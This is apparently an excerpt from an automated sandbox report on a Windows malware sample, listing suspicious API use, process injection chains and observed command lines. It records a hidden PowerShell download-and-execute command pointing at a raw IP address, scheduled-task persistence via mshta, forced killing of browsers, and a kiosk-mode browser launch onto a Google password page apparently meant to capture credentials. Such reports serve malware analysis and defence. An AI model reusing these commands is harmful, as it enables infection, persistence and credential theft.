Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 532 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe
PID 532 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe
PID 532 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe
PID 2140 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2140 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2140 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2940 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2940 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2940 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 4280 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 4280 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 4280 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2940 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe
PID 2940 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe
PID 2940 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe
PID 4464 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe C:\Windows\SysWOW64\cmd.exe
PID 4464 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe C:\Windows\SysWOW64\cmd.exe
PID 4464 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe C:\Windows\SysWOW64\cmd.exe
PID 4464 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe C:\Windows\SysWOW64\mshta.exe
PID 4464 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe C:\Windows\SysWOW64\mshta.exe
PID 4464 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe C:\Windows\SysWOW64\mshta.exe
PID 2696 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4864 wrote to memory of 1496 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4864 wrote to memory of 1496 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4864 wrote to memory of 1496 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2576 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2576 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2940 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2940 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2940 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1060 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1060 wrote to memory of 4572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1060 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4500 wrote to memory of 3820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4500 wrote to memory of 3820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4500 wrote to memory of 3820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 3948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE
PID 1496 wrote to memory of 3948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE
PID 1496 wrote to memory of 3948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE
PID 1060 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1060 wrote to memory of 4664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4664 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4664 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4664 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1060 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1060 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1060 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1060 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 1060 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 1060 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4768 wrote to memory of 936 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe

"C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 6QKiRmaQMTY /tr "mshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 6QKiRmaQMTY /tr "mshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE

"C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "qUdp4ma4jJN" /tr "mshta \"C:\Temp\m9sy3Qpjo.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\m9sy3Qpjo.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe

"C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3988 -ip 3988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 820

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe

"C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe"

C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe

"C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe

"C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe"

C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe

"C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe"

C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe

"C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe"

C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe

"C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d71a98c4-74cc-46cd-842d-20a1d41903dd} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2460 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ded5e7-249f-4225-a06d-b43d3c6e32a6} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" socket

C:\ProgramData\bcngpqs\ovql.exe

C:\ProgramData\bcngpqs\ovql.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2748 -childID 1 -isForBrowser -prefsHandle 3336 -prefMapHandle 3332 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b799800d-a53d-4e03-8e01-3d4ccbe4ad86} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3940 -prefMapHandle 3936 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a48ff07e-8e66-48c4-848b-7362395d41a9} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4792 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4860 -prefMapHandle 4856 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {902c3cf2-b2a6-4cae-93a4-edc9461ec68f} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -childID 3 -isForBrowser -prefsHandle 5100 -prefMapHandle 5096 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {556975f8-63b0-463c-a171-f422ffef4a00} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5344 -childID 4 -isForBrowser -prefsHandle 5348 -prefMapHandle 5352 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57fab3bd-02d4-4f3f-b10f-aa1227969539} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab

C:\Program Files\Mozilla Firefox\firefox.exe

